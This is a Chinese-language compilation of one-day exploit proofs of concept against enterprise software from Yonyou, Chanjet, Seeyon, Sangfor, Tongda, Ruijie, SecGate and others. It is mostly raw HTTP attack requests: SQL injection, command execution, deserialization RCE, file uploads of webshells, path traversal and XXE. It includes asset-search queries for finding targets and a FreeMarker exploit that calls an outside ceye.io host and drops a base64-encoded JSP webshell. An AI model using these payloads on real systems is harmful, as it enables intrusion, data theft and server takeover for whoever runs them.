Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.server If-None-Match: W/"1571-1589211696000" If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 104 cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream()) 用友畅捷通 T注入sqlmap -u http://xx.xx.xx.xx/WebSer~1/create_site.php?site_id=1 --is-dba用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Accept-Encoding: gzip, deflate Connection:用友时空 KSOATaskRequestServlet sql注入漏洞/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1,用友时空KSOA PayBill SQL注入漏洞POST /servlet/PayBill?caculate&_rnd= HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 134 Accept-Encoding: gzip, deflate Connection: close <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root> 命令执行 exec master..xp_cmdshell 'whoami'; 用友文件服务器认证绕过资产搜索：app="用友-NC-Cloud" 或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1" POST数据包修改返回包 false改成ture就可以绕过登陆 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 10 Aug 2023 20:38:25 GMT Connection: close Content-Length: 17 {"login":"false"}用有畅捷通T+GetStoreWarehouseByStore RCE漏洞POST /tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,AppCode.ashx?method=GetstoreWarehouseByStore HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11;Linuxx86 64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/34.0.1847.137 Safari 4E423F Connection: close Content-Length:668 X-Ajaxpro-Method:GetstoreWarehouseByStore Accept-Encoding:gzip { "storeID":{"type":"system.Windows.Data.objectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35", "MethodName":"start","objectInstance":{" type":"system.Diagnostics.Process, System,Version=4.0.0.0，Culture=neutral, PublicKeyToken=b77a5c561934e089" "startInfo":{" type":"system.Diagnostics.ProcessstartInfo, system,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089","FileName":"cmd", "Arguments":"/cwhoami>C:/Progra~2/Chanjet/TPlusStd/Website/2RUsL6jgx9sGX4GItBcVfxarBM.txt" } } } }远秋医学技能考试系统SQL注入sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -p id -batch云终端安全管理系统 login SQL注入漏洞POST /api/user/login Host:xxx.xxx.xxx.xxx:port captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='致远OA_V8.1SP2文件上传漏洞POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0) Accept-Encoding: gzip,deflate Cookie:JSESSIONID=5bGx5rW35LmL5YWz Cache-Control: no-cache Content-Encoding: deflate Pragma: no-cache Host: 1.1.1.1 Accept: text/html，image/gif, image/jpeg，*; q=.2,*/*; q=.2 Content-Length:522729 Connection: close X-Forwarded-For: 1.2.3.4 arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}致远OA任意管理员登录 POST /seeyon/thirdpartyController.do HTTP/1.1 method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1中远麒麟堡垒机SQL注入麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入，可利用该漏洞获取系统敏感信息。 检索条件: cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login" poc: relative: req0 && req1 session: false requests: - method: POST timeout: 10 path: /admin.php?controller=admin_commonuser headers: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 data: username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm follow_redirects: true matches: (code.eq("200") && time.gt("5") && time.lt("10")) - method: POST timeout: 10 path: /admin.php?controller=admin_commonuser headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 Content-Type: application/x-www-form-urlencoded data: username=admin follow_redirects: true matches: time.lt("5") 检索条件： cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login" POC： relative: req0 && req1 session: false 第一个请求： 方法：POST 超时：10秒 路径：/admin.php?controller=admin_commonuser 请求头部： Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 请求数据：username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm 跟随重定向：true 匹配条件：响应码为200且响应时间大于5秒且小于10秒 第二个请求： 方法：POST 超时：10秒 路径：/admin.php?controller=admin_commonuser 请求头部： User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 Content-Type: application/x-www-form-urlencoded 请求数据：username=admin 跟随重定向：true 匹配条件：响应时间小于5秒

HW情报-2023年8月19日-1day汇总 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞 POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1 Host: Accept: text/plain, */*; q=0.01 Content-Disposition: form-data; name="file"; filename="111.php" Content-Type: image/jpeg <?php phpinfo();?>锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露 批量扫描工具：https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL GET /EXCU_SHELL HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 Accept-Encoding: gzip, deflate Accept: / Connection: close Cmdnum: '1' Command1: show running-config Confirm1: n深信服 sxf-报表系统 任意命令执行漏洞版本有限制POST /rep/login HTTP/1.1 Host: URL Cookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq深信服报表 任意读取GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1 Host: xx.xx.xx.xx:85 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive深信服数据中心管理系统 XML 实体注入漏洞GET /src/sangforindex HTTP/1.1 Host: ip:port Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Accept: text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: text/xml Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: Keep-alive Content-Length: 135 <?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [ <!ENTITY rootas SYSTEM "http://dnslog"> ]> <xxx> &rootas; </xxx>深信服应用交付系统敏感信息泄露xxx.xxx.xxx.xxx:port/tmp/updateme/sinfor/ad/sys/sys_user.conf深信服应用交付系统命令执行漏洞POST /rep/login Host:xxx.xxx.xxx.xxx:port clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123通达OA sql注入漏洞 CVE-2023-4165 POCGET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1通达OA sql注入漏洞 CVE-2023-4166 POCGET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC默认上传路径 /secgate/webui/attachements/ ， 访问 attachements/xxx.php 文件 POST /?g=obj_app_upfile HTTP/1.1 Host: x.x.x.x Accept: */* Accept-Encoding: gzip, deflate Content-Length: 574 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="upfile"; filename="vulntest.php" Content-Type: text/plain <?php php马?> ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="submit_post" obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="__hash__" 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc--网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"} old_pass=&password=Test123!@&repassword=Test123!@网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1 Host: [你的主机名或IP地址]新开普智慧校园系统代码执行漏洞漏洞详情新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入，攻击者可在未经身份认证的情况下，调用后台接口，构造恶意代码实现远程代码执行，最终可造成服务器失陷。路径存在则漏洞存在 http://xxx.com/service_transport/service.action 纯文本 poc没回显 POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 { "command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c ping v0u26h.ceye.io\")}" } 纯文本 写文件 POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 { "command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}" } 纯文本 文件转换为jsp POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 { "command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}" }移动管理系 统 uploadApk.do 任意文件上传漏洞POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: xxx.xxx.xxx.xxx:port Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition: form-data; name="downloadpath"; filename="a.jsp" Content-Type: application/msword hello